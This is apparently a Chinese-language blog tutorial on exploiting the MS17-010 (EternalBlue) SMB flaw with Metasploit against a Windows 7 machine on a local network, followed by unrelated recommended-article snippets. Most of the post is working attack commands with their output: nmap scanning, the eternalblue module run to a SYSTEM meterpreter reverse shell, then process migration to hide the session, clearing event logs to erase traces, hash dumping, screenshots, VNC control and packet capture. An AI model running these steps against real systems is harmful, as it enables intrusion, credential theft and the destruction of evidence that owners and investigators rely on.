使用metasploit(MSF)对windows的ms17-010漏洞进行利用_use exploit/windows/smb/smb_doublepulsar_rce-程序员宅基地
主机发现
Ping扫描-禁用端口扫描
nmap -sn 192.168.1.0/24
─# nmap -sn 192.168.1.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-14 10:00 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0053s latency).
MAC Address: FC:BC:D1:C7:2F:A8 (Huawei Technologies)
Nmap scan report for 192.168.1.11
Host is up (0.00012s latency).
MAC Address: A0:AF:BD:2B:7D:A7 (Intel Corporate)
Nmap scan report for 192.168.1.24
Host is up (0.016s latency).
MAC Address: 74:EF:4B:3C:DD:3B (Guangdong Oppo Mobile Telecommunications)
Nmap scan report for 192.168.1.26
Host is up (0.00033s latency).
MAC Address: 00:0C:29:7E:DB:C2 (VMware)
Nmap scan report for 192.168.1.30
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.97 seconds
脚本扫描
负责检查目标机是否有常见漏洞,如MS08-067
nmap --script=vuln 192.168.1.26
─# nmap --script=vuln 192.168.1.26
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-14 09:50 EDT
Stats: 0:01:06 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 87.36% done; ETC: 09:51 (0:00:08 remaining)
Stats: 0:01:31 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 88.47% done; ETC: 09:52 (0:00:10 remaining)
Nmap scan report for 192.168.1.26
Host is up (0.0022s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1028/tcp open unknown
1029/tcp open ms-lsa
1032/tcp open iad3
MAC Address: 00:0C:29:7E:DB:C2 (VMware)
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 110.66 seconds
使用metasploit(MSF)对windows的ms17-010漏洞进行利用
msfconsole
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v6.2.20-dev ]
+ -- --=[ 2251 exploits - 1187 auxiliary - 399 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View missing module options with show
missing
Metasploit Documentation: https://docs.metasploit.com/
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> spool /root/msf_console.log
[*] Spooling to file /root/msf_console.log...
msf6 >
search ms17-010
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 >
use exploit/windows/smb/ms17_010_eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Win
dows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows
Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded
Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):set rhosts 192.168.1.26
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.1.26
rhosts => 192.168.1.26
msf6 exploit(windows/smb/ms17_010_eternalblue) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.26 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Win
dows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows
Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded
Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.30 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf6 exploit(windows/smb/ms17_010_eternalblue) > 设置目标机的IP,其他选项默认就可以;
开始攻击
run
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.1.30:4444
[*] 192.168.1.26:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.26:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit)
[*] 192.168.1.26:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.1.26:445 - The target is vulnerable.
[*] 192.168.1.26:445 - Connecting to target for exploitation.
[+] 192.168.1.26:445 - Connection established for exploitation.
[+] 192.168.1.26:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.26:445 - CORE raw buffer dump (25 bytes)
[*] 192.168.1.26:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70 Windows 7 Enterp
[*] 192.168.1.26:445 - 0x00000010 72 69 73 65 20 37 36 30 30 rise 7600
[+] 192.168.1.26:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.26:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.26:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.26:445 - Starting non-paged pool grooming
[+] 192.168.1.26:445 - Sending SMBv2 buffers
[+] 192.168.1.26:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.26:445 - Sending final SMBv2 buffers.
[*] 192.168.1.26:445 - Sending last fragment of exploit packet!
[*] 192.168.1.26:445 - Receiving response from exploit packet
[+] 192.168.1.26:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.26:445 - Sending egg to corrupted connection.
[*] 192.168.1.26:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.1.26
[+] 192.168.1.26:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.26:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.26:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.1.30:4444 -> 192.168.1.26:1069) at 2023-08-14 10:15:16 -0400
meterpreter >
成功获得session。
meterpreter > sysinfo
Computer : WIN-37QHU1C4KU9
OS : Windows 7 (6.1 Build 7600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
background 将当前会话转移到后台
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN-37QHU1C4KU9 192.168.1.30:4444 -> 192.168.1.26:1069 (192.168.1.26)
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > migrate 迁移会话进程到指定pid
ps 进程列表
达到隐藏控制会话的进程,此时原来的进程是看不到的目的。
通过ps可以看到受害机的哪些进程。比如我这里弄1824
clearev 清除系统事件
为了,不让暴露我们攻击者的痕迹行为。
清除攻击机的事件发生器,此时再看对方(即被害主机)里面啥都没了。
查看会话进程的pid
meterpreter > getpid
Current pid: 1528
meterpreter >查看权限
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
shell命令,是进入cmdshell
meterpreter > shell
Process 944 created.
Channel 43 created.
Microsoft Windows [�汾 6.1.7600]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\Windows\system32>ipconfig
ipconfig
Windows IP ����
���������� Bluetooth ��������:
ý��״ . . . . . . . . . . . . : ý���ѶϿ�
�����ض��� DNS �� . . . . . . . :
���������� ��������:
�����ض��� DNS �� . . . . . . . :
IPv6 �� . . . . . . . . . . . . : 2409:8a44:7c:2850::1
�������� IPv6 ��. . . . . . . . : fe80::a519:43c5:fa7a:d978%11
IPv4 �� . . . . . . . . . . . . : 192.168.1.26
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . : 192.168.1.1
���������� isatap.{0F24E55B-C683-4D89-A432-C4DFA97651B9}:
ý��״ . . . . . . . . . . . . : ý���ѶϿ�
�����ض��� DNS �� . . . . . . . :
���������� isatap.{3D2C4AA2-FC90-43B5-9F29-F514D33C1A84}:
ý��״ . . . . . . . . . . . . : ý���ѶϿ�
�����ض��� DNS �� . . . . . . . :
C:\Windows\system32>
发现用乱码可以用这个取消乱码:
chcp 65001sysinfo,来查看系统信息
meterpreter > sysinfo
Computer : WIN-37QHU1C4KU9
OS : Windows 7 (6.1 Build 7600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
screenshot ,截屏并保存到一个文件
meterpreter > screenshot
Screenshot saved to: /root/桌面/bqAuzuzN.jpeg
meterpreter >
getsystem,提升至system系统最高权限
Meterpreter下的run脚本使用
run 连续按两下tab,得到
meterpreter > run
Display all 552 possibilities? (y or n)
run autoroute run post/osx/admin/say
run duplicate run post/osx/capture/keylog_recorder
run enum_firefox run post/osx/capture/screen
run enum_vmware run post/osx/escalate/tccbypass
run event_manager run post/osx/gather/apfs_encrypted_volume_passwd
run exploit/multi/local/allwinner_backdoor run post/osx/gather/autologin_password
run exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc run post/osx/gather/enum_adium
run exploit/multi/local/xorg_x11_suid_server run post/osx/gather/enum_airport
run exploit/multi/local/xorg_x11_suid_server_modulepath run post/osx/gather/enum_chicken_vnc_profile
run exploit/windows/local/adobe_sandbox_adobecollabsync run post/osx/gather/enum_colloquy
run exploit/windows/local/agnitum_outpost_acs run post/osx/gather/enum_keychain
run exploit/windows/local/alpc_taskscheduler run post/osx/gather/enum_messages
run exploit/windows/local/always_install_elevated run post/osx/gather/enum_osx
run exploit/windows/local/anyconnect_lpe run post/osx/gather/gitignore
run exploit/windows/local/applocker_bypass run post/osx/gather/hashdump
run exploit/windows/local/appxsvc_hard_link_privesc run post/osx/gather/password_prompt_spoof
run exploit/windows/local/ask run post/osx/gather/safari_lastsession
run exploit/windows/local/bits_ntlm_token_impersonation run post/osx/gather/vnc_password_osx
run exploit/windows/local/bthpan run post/osx/manage/mount_share
run exploit/windows/local/bypassuac run post/osx/manage/record_mic
run exploit/windows/local/bypassuac_comhijack run post/osx/manage/sonic_pi
run exploit/windows/local/bypassuac_dotnet_profiler run post/osx/manage/vpn
run exploit/windows/local/bypassuac_eventvwr run post/osx/manage/webcam
run exploit/windows/local/bypassuac_fodhelper run post/solaris/escalate/pfexec
run exploit/windows/local/bypassuac_injection run post/solaris/escalate/srsexec_readline
run exploit/windows/local/bypassuac_injection_winsxs run post/solaris/gather/checkvm
run exploit/windows/local/bypassuac_sdclt run post/solaris/gather/enum_packages
run exploit/windows/local/bypassuac_silentcleanup run post/solaris/gather/enum_services
run exploit/windows/local/bypassuac_sluihijack run post/solaris/gather/hashdump
run exploit/windows/local/bypassuac_vbs run post/windows/capture/keylog_recorder
run exploit/windows/local/bypassuac_windows_store_filesys run post/windows/capture/lockout_keylogger
--More--
run hashdump 来获取系统账号hash
注意:这个脚本的使用,是事先得要getsystem后,才能有效。
run post/windows/gather/enum_applications 获取系统安装程序
run vnc 用vnc控制对方桌面
run winenum 运行windows常用枚举信息
run packetrecorder -i 1 开启抓包
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
智能推荐
Bug的生命周期状态流程图_bug生命周期流程图-程序员宅基地
文章浏览阅读4.3k次,点赞2次,收藏8次。bug的生命周期BUG的生命周期,就是一个BUG被发现到这个BUG被关闭的过程。生命周期中缺陷状态:新建-->指派-->已解决-->待验-->关闭发现BUG-->提交BUG-->指派BUG-->研发确认BUG-->研发去修复BUG-->回归验证BUG-->是否通过验证-->关闭BUG如果待验的BUG在验证时没有解决好,我们需要重新打开--指派—已解决—待验,循环这个过程。中间其他状态:拒绝、延期等_bug生命周期流程图
Pandas对行/列求和_pandas对具体列求和-程序员宅基地
文章浏览阅读5.3k次,点赞3次,收藏18次。Pandas对行/列求和_pandas对具体列求和
Visio--用例图、类图、顺序图、活动图_visio画用例图-程序员宅基地
文章浏览阅读1.9w次,点赞32次,收藏228次。做个小结。_visio画用例图
程序员的路----程序员一定要仔细看_程序员的道路-程序员宅基地
文章浏览阅读2.2k次。在网上看到的恶搞程序员的图片,实在是搞笑。看一次笑一次!程序猿的十年他不是乞丐,请尊称他为程序猿。对,他就是程序猿!其实,你们看到的不是僵尸,他们都是苦逼的程序猿!这不是恶搞的,是一个真实的故事!看他的拐杖,其实也挺可怜的!不知是不是敲代码敲多了,把脚敲颓了!_程序员的道路
从Atlas到Microsoft ASP.NET AJAX(6) - Networking, Application Services-程序员宅基地
文章浏览阅读42次。NetworkingCalling Web Service Methods from Script 为了简化Web Services方法调用,客户端代理的设计被改变了,它在方法调用和回调函数设置方面提供了强大的灵活性。 下面的例子展示了CTP版本中Web Services方法的客户端调用,以及回调函数的使用方式。第一个例子展示了在CTP版本中Web ..._.net6 applicationservices
一文带你了解socket网络编程以及详解过程和原理_socket编程-程序员宅基地
文章浏览阅读1.1w次,点赞42次,收藏178次。Socket(套接字)是计算机网络编程中的一种抽象概念,它提供了在网络上进行通信的接口。通过使用 Socket,可以在不同计算机之间建立连接,并进行数据的传输和交换。通过 Socket,客户端可以与服务器建立连接并发送请求,服务器接收请求并返回响应。通过 Socket,可以在多个用户之间实现实时的文字、音频或视频通信。可以使用 Socket 在不同计算机之间传输文件,如上传和下载文件。可通过 Socket 在远程计算机上执行指令或操作。_socket编程
随便推点
IT发展方向_it以后的几个方向-程序员宅基地
文章浏览阅读626次。自己的IT发展方向。1.做T型进化,横向做语言(java、python)的扩展,纵向主要是算法、模式、计算机原理。2.多系统的学习,WINDOW和LINUX的基本操作及维护。3.尽量做产品,少做项目,提高自己的竞争力。4.外语学习,日语是工作方面,英语是学习方面。坚持做自己喜欢的事。_it以后的几个方向
计算机考研408每日一题 day78_命中率高且电路实现简单的cache内存映射方式-程序员宅基地
文章浏览阅读392次。对于二叉排序树,下面的说法 ___是正确的。(华南理工大学 2006年)设备驱动程序在读写磁盘数据时一般釆用下列哪种I/O方式?(中国科学院大学 2018)下列___交换技术是独占信道工作方式。(中南大学 2006年)命中率高且电路实现简单的Cache 与内存映射方式是___映射方式。(中国科学院大学 2015)_命中率高且电路实现简单的cache内存映射方式
Unhandled exceptions: java.lang.IllegalAccessException, java.lang.reflect.InvocationTargetException_unhandled exceptions: java.lang.instantiationexcep-程序员宅基地
文章浏览阅读3.2k次。可能是没有异常处理,只需要加上throws Exception就解决问题了。_unhandled exceptions: java.lang.instantiationexception, java.lang.illegalacc
webview ERROR_UNSUPPORTED_SCHEME ,errorcode=-10问题处理-程序员宅基地
文章浏览阅读1.5k次。webView.setWebViewClient(new WebViewClient(){ @Override public boolean shouldOverrideUrlLoading(WebView view, String url) { try{ if(url.startsWith("baidumap://")){ Intent _error_unsupported_scheme
embed标签-程序员宅基地
文章浏览阅读66次。Embed (一)、基本语法: embed src=url 说明:embed可以用来插入各种多媒体,格式可以是 Midi、Wav、AIFF、AU、MP3等等, Netscape及新版的IE 都支持。url为音频或视频文件及其路径,可以是相对路径或绝对路径。 示例:<embed src="your.mid"> (二)、属性设置: 1、自动播放...
php 上传文件漏洞,PHP -- 文件包含、文件上传漏洞-程序员宅基地
文章浏览阅读330次。PHP -- 文件包含、文件上传漏洞PHP -- 文件包含、文件上传漏洞文件包含文件引入漏洞,是由一个动态页面编译时引入另一个文件的操作。文件引入本身是没有问题,它是用于统一页面风格,减少代码冗余的一种技术。但是在特定的场景下就会形成漏洞jsp:include指令和include动作,其中include动作用于引入动态文件php:include(),include_once(),require()..._php文件上传4漏洞